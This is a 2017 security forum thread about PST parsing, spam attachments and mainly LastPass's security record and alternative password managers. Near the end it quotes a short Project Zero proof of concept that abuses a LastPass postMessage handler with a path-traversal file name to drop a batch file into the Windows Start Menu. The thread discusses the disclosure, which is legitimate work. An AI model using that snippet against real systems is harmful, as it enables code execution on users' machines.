Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

Diva Cupcake
Aug 15, 2005

Diametunim posted:

Anybody have tips for parsing PST files? I need to grab every email sent or received in an eight month time-span. Once I've done that I need to comb through the emails for certain keywords. I've tried using the built in advanced features in outlook but for some reason Outlook isn't returning all of the results. I'd like to do this programmatically but searching for python libraries that can parse PST files doesn't bring up much. Maybe this is a chance to export the PST and use one of the encase machines in my office.

Combing through peoples emails is really boring.
Are you exporting to PST from Exchange or Outlook? If Exchange you can do so via the shell. Start it off something like...

New-MailboxExportRequest -ContentFilter {((Received -ge "10/01/2015") -and (Received -le "12/31/2015")) -or ((Sent -ge "10/01/2015") -and (Sent -le "12/31/2015"))}

Adbot
ADBOT LOVES YOU

Mr Chips
Jun 27, 2007
Whose arse do I have to blow smoke up to get rid of this baby?
It should be possible to knock up a quick powershell script to read the contents of a PST mounted in Outlook (there's a bunch of API classes and methods documented on MSDN for this sort of thing), but if it was me doing it I'd have to second the suggestion of using libpst+readpst

Mr Chips fucked around with this message at 11:10 on Mar 18, 2017

Boris Galerkin
Dec 17, 2011

I don't understand why I can't harass people online. Seriously, somebody please explain why I shouldn't be allowed to stalk others on social media!
What is it about LastPass that makes it so bad? I use 1Password and I almost never hear about any earth shattering vulnerabilities but I don't know enough about them to know how they do things differently. Is it some kind of exposure thing? I'm not sure LastPass has an android app, and it was traditionally a OS X app and the lovely sluggish Windows version shows. More people using LastPass = more exploits found or is it something more fundamental like "those devs just don't know what they are doing?"

Khablam
Mar 29, 2012

Boris Galerkin posted:

What is it about LastPass that makes it so bad? I use 1Password and I almost never hear about any earth shattering vulnerabilities but I don't know enough about them to know how they do things differently. Is it some kind of exposure thing? I'm not sure LastPass has an android app, and it was traditionally a OS X app and the lovely sluggish Windows version shows. More people using LastPass = more exploits found or is it something more fundamental like "those devs just don't know what they are doing?"

Imagine if the most popular password manager (and ergo the biggest target) was also the one with the devs who don't know what they're doing: Lastpass

Three-Phase
Aug 5, 2006

by zen death robot

Sheep posted:

Are you sure it's an attachment and not an embedded image? That's often done so when the client loads the file they can track that someone (or something, but whatever) is checking the account, and then mark the address as a valid destination for future spam.

Edit: there are also random JPEG exploits like this that exist too, I guess.

100% sure it was an attachment. Using that to spread a JPEG exploit is possible but based on that CVE it only seems to work with certain software and much older OSes (Windows XP) but on the other hand I am sure throughout the world there are still tons of machines running poorly updated copies of Windows XP.

Scikar
Nov 20, 2005

5? Seriously?

Three-Phase posted:

100% sure it was an attachment. Using that to spread a JPEG exploit is possible but based on that CVE it only seems to work with certain software and much older OSes (Windows XP) but on the other hand I am sure throughout the world there are still tons of machines running poorly updated copies of Windows XP.

Barracuda spam filters got a mention recently because they don't scan emails above 256kB by default, on the basis that spammers don't send emails bigger than that but scanning large emails is more resource intensive. I'm a sure a spammer using a botnet would be fairly happy to use up more of somebody else's bandwidth to get more emails through to inboxes though. So it might just be to add size to the email while using a file format that isn't suspicious itself.

Three-Phase
Aug 5, 2006

by zen death robot

Scikar posted:

Barracuda spam filters got a mention recently because they don't scan emails above 256kB by default, on the basis that spammers don't send emails bigger than that but scanning large emails is more resource intensive. I'm a sure a spammer using a botnet would be fairly happy to use up more of somebody else's bandwidth to get more emails through to inboxes though. So it might just be to add size to the email while using a file format that isn't suspicious itself.

That's an interesting angle - the file size was about 200kB. The thing is there was no other content - no subject and no text. What's interesting is that at work (totally different account) there have been times where someone called me and requested something and in a rush I sent an email with no subject and no text, just an attachment (usually a picture of equipment or a reference document or whatnot).

But yeah if they have a server sending messages 200kb versus 20kb makes a big difference. But if it's coming from a compromised machine or email address it's a "don't care" situation and it makes sense that larger emails (with non-executable or archived or encrypted contents) may slip through.

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...
Based on what I've seen before, I'd safely bet that the image attachment is solely to get around spam text scanning in low end anti spam endpoints. It's been around so long that I can't imagine it still working though.

Just ignore them.

Absurd Alhazred
Mar 27, 2010

by Athanatos
https://twitter.com/hacks4pancakes/status/843299108504948736

PBCrunch
Jun 17, 2002

Lawrence Phillips Always #1 to Me
Let's say I have a page with sensitive information on an Apache server. The server is running https-only and the sensitive information requires a login and password for access.

An iOS user is frustrated because Safari won't just store the login details, so the iOS user must enter the login information manually every time.

How much less secure is it to just make the resource accessible by entering an extremely long gibberish-filled URL? Let's ignore factors related to the iOS device, like losing the device or the device being compromised.

Subjunctive
Sep 12, 2006

✨sparkle and shine✨

PBCrunch posted:

How much less secure is it to just make the resource accessible by entering an extremely long gibberish-filled URL? Let's ignore factors related to the iOS device, like losing the device or the device being compromised.

One big issue with doing that is that the credential will be logged by proxies or Apache, which could inadvertently leak.

Why won't Safari save the login info? Will Chrome?

wolrah
May 8, 2006
what?
Why won't the iOS device save the credentials? I'd fix that rather than trying to make an obscured URL.

I'm betting the reason is a bogus SSL cert since that definitely makes Chrome not want to save passwords, in which case Let's Encrypt is the answer.

PBCrunch
Jun 17, 2002

Lawrence Phillips Always #1 to Me

wolrah posted:

Why won't the iOS device save the credentials? I'd fix that rather than trying to make an obscured URL.

I'm betting the reason is a bogus SSL cert since that definitely makes Chrome not want to save passwords, in which case Let's Encrypt is the answer.

I used Let's Encrypt. Chrome on my Android phone saves the password no problem, as do Chrome and Firefox on my desktop computer, but iOS refuses to do it. I get the nice green "Secure" lock when I visit the page in Chrome.

I have no experience with iOS, so I don't know what the cause is.

Rufus Ping
Dec 27, 2006

I'm a Friend of Rodney Nano
If you're using http basic auth get them to bookmark https://user:pass@whatever

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...
Seriously, the answer here is to figure out the underlying issue and figure out if it's fixable.

I guess it's also a question of how sensitive this info is vs how hard it is to actually fix the problem vs how important the one user here is.

Furism
Feb 21, 2006

Live long and headbang

Khablam posted:

Imagine if the most popular password manager (and ergo the biggest target) was also the one with the devs who don't know what they're doing: Lastpass

Please explain.

Proteus Jones
Feb 28, 2013

Furism posted:

Please explain.

Last pass is a garbage fire of insecure coding practices, particularly in regards to the browser plugins. Tavis Ormandy keeps owning them over and over and over.

Dex
May 26, 2006

Quintuple x!!!

Would not escrow again.

VERY MISLEADING!
i think you're exaggera
https://twitter.com/taviso/status/843965519371812864
ting a bit

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender
I'd dig up my effort post that explains why fundamentally it is bad but Tavis' bug reports are good enough.

Absurd Alhazred
Mar 27, 2010

by Athanatos
Cutting edge stuff:

https://twitter.com/thezdi/status/842788469923442689

CLAM DOWN
Feb 13, 2007

Furism
Feb 21, 2006

Live long and headbang

flosofl posted:

Last pass is a garbage fire of insecure coding practices, particularly in regards to the browser plugins. Tavis Ormandy keeps owning them over and over and over.

Yeah, OK, but is it because he focuses on LastPass only or because LP is bad? This sounds like the whole "there are no viruses on Mac because it's a safe OS" from a few years ago just because nobody bothered to write any.

Thanks Ants
May 21, 2004

#essereFerrari

I can be both bad and only look worse than the competition due to the focus on it. Being poorly written isn't really a thing that is only true because people are trying to find problems with it.

As in, applying the same level of focus to all password managers might reveal them all to be complete poo poo, it isn't going to suddenly make LastPass secure.

Furism
Feb 21, 2006

Live long and headbang

Thanks Ants posted:

I can be both bad and only look worse than the competition due to the focus on it. Being poorly written isn't really a thing that is only true because people are trying to find problems with it.

As in, applying the same level of focus to all password managers might reveal them all to be complete poo poo, it isn't going to suddenly make LastPass secure.

Yes, and that isn't what I was implying. Sorry if I wasn't clear.

Do we know for a fact it's poorly written, or just that there are some flaws? I don't think it's quite the same.

I don't want to sound like I'm mindlessly defending LP. I'm just looking for the best password manager there is and if LP isn't that anymore then I want to understand why.

FlapYoJacks
Feb 12, 2009

Furism posted:

Yeah, OK, but is it because he focuses on LastPass only or because LP is bad? This sounds like the whole "there are no viruses on Mac because it's a safe OS" from a few years ago just because nobody bothered to write any.

Travis focuses on all sorts of products that deal with "security." He's the John Wick of destroying security products. Mostly AV, but he's been on a last pass kick recently. He also tore 1pass a new one earlier, but people seem to ignore that. :allears:

Khablam
Mar 29, 2012

Furism posted:

Do we know for a fact it's poorly written, or just that there are some flaws? I don't think it's quite the same.

Read the bug reports like suggested?
These aren't "a clever means was found to use X to do Y" but largely "basic common practices haven't been applied and I got the code to do something it wasn't meant to do in about 2mins of trying".

baka kaba
Jul 19, 2003

PLEASE ASK ME, THE SELF-PROFESSED NO #1 PAUL CATTERMOLE FAN IN THE SOMETHING AWFUL S-CLUB 7 MEGATHREAD, TO NAME A SINGLE SONG BY HIS EXCELLENT NU-METAL SIDE PROJECT, SKUA, AND IF I CAN'T PLEASE TELL ME TO
EAT SHIT

Furism posted:

Yes, and that isn't what I was implying. Sorry if I wasn't clear.

I don't want to sound like I'm mindlessly defending LP. I'm just looking for the best password manager there is and if LP isn't that anymore then I want to understand why.

Nobody can really say how well written it is, it's not like they release the code, but this is the kind of thing where flaws are a big problem. So having any issues like these in a security product kinda makes it 'poorly written', in that it's failing to do what it sets out to do

The trouble with LastPass is it's really convenient - all your passwords are automatically in the :cloud:, the browser plugin handles getting and updating those passwords for you, it works some internet magic to automatically determine the right credentials and where they should be pasted on the page, and it all just runs within the browser with an extension that pops up its own UI. There's a lot to go wrong in there, and the exploits that have come out have hit all of these different aspects, from insecure password handling, to malicious websites impersonating another domain so the password is automatically filled in, to phishing scams where the extension's login UI pops up (but it's actually in another web page if you look real closely)

That and the fact it's so popular and centralised means it's a good target for people to attack - compromise their site and you can possibly get everything, spread an exploit around malicious pages/ads to grab a common site's credentials and you'll catch a decent chunk of LastPass users. That and the number of links in the chain make it inherently risky, so you have to trust they'll always be on top of things, but the exploits suggest they're not. Whether the convenience is worth it is up to you, but that's why it's not the 'best' password manager

Kassad
Nov 12, 2005

It's about time.
Speaking of basic common practices not being applied: Firefox gets complaint for labeling unencrypted login page insecure

quote:

Update: Around the same time this post was going live, participants of this Reddit thread claimed to hack the site using what's known as a SQL injection exploit. Multiple people claimed that passwords were stored in plaintext rather than the standard practice of using cryptographic hashes. A few minutes after the insecurity first came up in the online discussion, a user reported the database was deleted.

[...]

Update: As several commenters have pointed out, the site's subscription page transmits credit card information over plain-vanilla HTTP pages as well. The lack of protection is made worse by the assurance on the same page that: "All credit card information is encrypted using our Secure Transaction Server." Making matters worse still: the login page is returning error messages that indicate it may be vulnerable to SQL injection attacks.

Wiggly Wayne DDS
Sep 11, 2010

we've had multiple arguments about lastpass in this thread when their security failures come to light so let's get this over with

ratbert90 posted:

He also tore 1pass a new one earlier, but people seem to ignore that. :allears:
who's ignoring that? how developers deal with issues put forward to them and improve going forward should be your highest priority in deciding on a vendor. do you remember lastpass' servers were compromised?

note that compromise was june 2015 and their security guarantees on what an attacker can do with that information are absurdly inaccurate when compared to this november 2015 assessment. i've summarised that assessment before but for those who don't want to read the entire thing:

Wiggly Wayne DDS posted:

If your password manager, by default, has an unencrypted key stored (dOTP) that can be used to authenticate, obtain the encrypted vault key, decrypt the vault key, bypass IP restrictions, bypass 2FA and relies on local storage being impenetrable then you've got a bit of a design flaw. We've seen the damage in the past when Lastpass had an XSS problem that let an attacker grab any plaintext passwords from a vault silently. You're not storing your vault on a single system by virtue of using Lastpass so that is not the only possible angle of attack, and based on prior issues I can't comfortably advise people to use it for secure password storage. Especially given their response to the issues presented.

psydude
Apr 1, 2008

baka kaba posted:

Nobody can really say how well written it is, it's not like they release the code, but this is the kind of thing where flaws are a big problem. So having any issues like these in a security product kinda makes it 'poorly written', in that it's failing to do what it sets out to do

The trouble with LastPass is it's really convenient - all your passwords are automatically in the :cloud:, the browser plugin handles getting and updating those passwords for you, it works some internet magic to automatically determine the right credentials and where they should be pasted on the page, and it all just runs within the browser with an extension that pops up its own UI. There's a lot to go wrong in there, and the exploits that have come out have hit all of these different aspects, from insecure password handling, to malicious websites impersonating another domain so the password is automatically filled in, to phishing scams where the extension's login UI pops up (but it's actually in another web page if you look real closely)

That and the fact it's so popular and centralised means it's a good target for people to attack - compromise their site and you can possibly get everything, spread an exploit around malicious pages/ads to grab a common site's credentials and you'll catch a decent chunk of LastPass users. That and the number of links in the chain make it inherently risky, so you have to trust they'll always be on top of things, but the exploits suggest they're not. Whether the convenience is worth it is up to you, but that's why it's not the 'best' password manager

I mean I get that this opens up risks for the average person, but really it just sounds like the same old rules of common sense internet use still apply. Install uBlock, watching for phishing attacks, use OpenDNS when possible, etc. This is the case regardless as to whether or not you're using a password manager.

Khablam
Mar 29, 2012

psydude posted:

I mean I get that this opens up risks for the average person, but really it just sounds like the same old rules of common sense internet use still apply. Install uBlock, watching for phishing attacks, use OpenDNS when possible, etc. This is the case regardless as to whether or not you're using a password manager.

uBlock blacklists ads.
It doesn't audit the code of every wordpress blog you visit to check someone hasn't compromised it to use the LP exploit(s) against everyone visiting.
The solution is to not use lastpass, not decide "other things I do for other reasons make me safe".

It's honestly loving bizarre how far lastpass users will double-down on hand-waving the very very obvious issues it has, both in concept and execution of it.

psydude
Apr 1, 2008

Khablam posted:

uBlock blacklists ads.
It doesn't audit the code of every wordpress blog you visit to check someone hasn't compromised it to use the LP exploit(s) against everyone visiting.
The solution is to not use lastpass, not decide "other things I do for other reasons make me safe".

It's honestly loving bizarre how far lastpass users will double-down on hand-waving the very very obvious issues it has, both in concept and execution of it.

I'm not a lastpass user, nor am I doubling down on protecting it. I'm just saying that most of the stuff you mentioned, including XSS attacks, is going to be an issue regardless of whether or not you're using last pass or really anything else. And yes, I'm aware that the exploits you're talking about are LP specific.

e: Hey here's an idea, how about some suggestions for alternatives? That's what the dude was asking for.

psydude fucked around with this message at 18:12 on Mar 21, 2017

Lain Iwakura
Aug 5, 2004

Taco Defender

psydude posted:

I'm not a lastpass user, nor am I doubling down on protecting it. I'm just saying that most of the stuff you mentioned, including XSS attacks, is going to be an issue regardless of whether or not you're using last pass or really anything else. And yes, I'm aware that the exploits you're talking about are LP specific.

e: Hey here's an idea, how about some suggestions for alternatives? That's what the dude was asking for.

Free:
KeePass and Dropbox

Paid:
1Password

CLAM DOWN
Feb 13, 2007

OSI bean dip posted:

Free:
KeePass and cloud storage that isn't Dropbox

Fixed :colbert:

Lain Iwakura
Aug 5, 2004

Taco Defender

It doesn't really matter in the end what your cloud storage option is provided you're securing the password database with a decent keyphrase and are using key files not stored in the cloud.

CLAM DOWN
Feb 13, 2007

OSI bean dip posted:

It doesn't really matter in the end what your cloud storage option is provided you're securing the password database with a decent keyphrase and are using key files not stored in the cloud.

I know I just despise and distrust dropbox :(

Powered Descent
Jul 13, 2008

We haven't had that spirit here since 1969.

CLAM DOWN posted:

I know I just despise and distrust dropbox :(

Encryption works really well with Dropbox or other cloud storage, for exactly that reason. ecryptfs and encfs are pretty much made for this: set the Dropbox folder as the encrypted root, and mount the plaintext view wherever convenient. Then just work with your files normally via that plaintext view, and the encrypted backend gets updated transparently. Dropbox never sees anything that isn't scrambled to hell and back.

e: Granted, this isn't much use for a program like a password manager that's going to use Dropbox in its own way, not yours. This is just in general.

Wiggly Wayne DDS
Sep 11, 2010

lastpass vuln is up: https://bugs.chromium.org/p/project-zero/issues/detail?id=1209#c5

quote:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

quote:

LastPass responded and said they have NXDOMAIN'd 1min-ui-prod.service.lastpass.com while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

quote:

I've uploaded the exploit here:

https://lock.cmpxchg8b.com/SaiGhij5/lastpass.html

Lain Iwakura
Aug 5, 2004

Taco Defender

quote:

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

Quality.

Adbot
ADBOT LOVES YOU

eames
May 9, 2009

quote:

:stonk: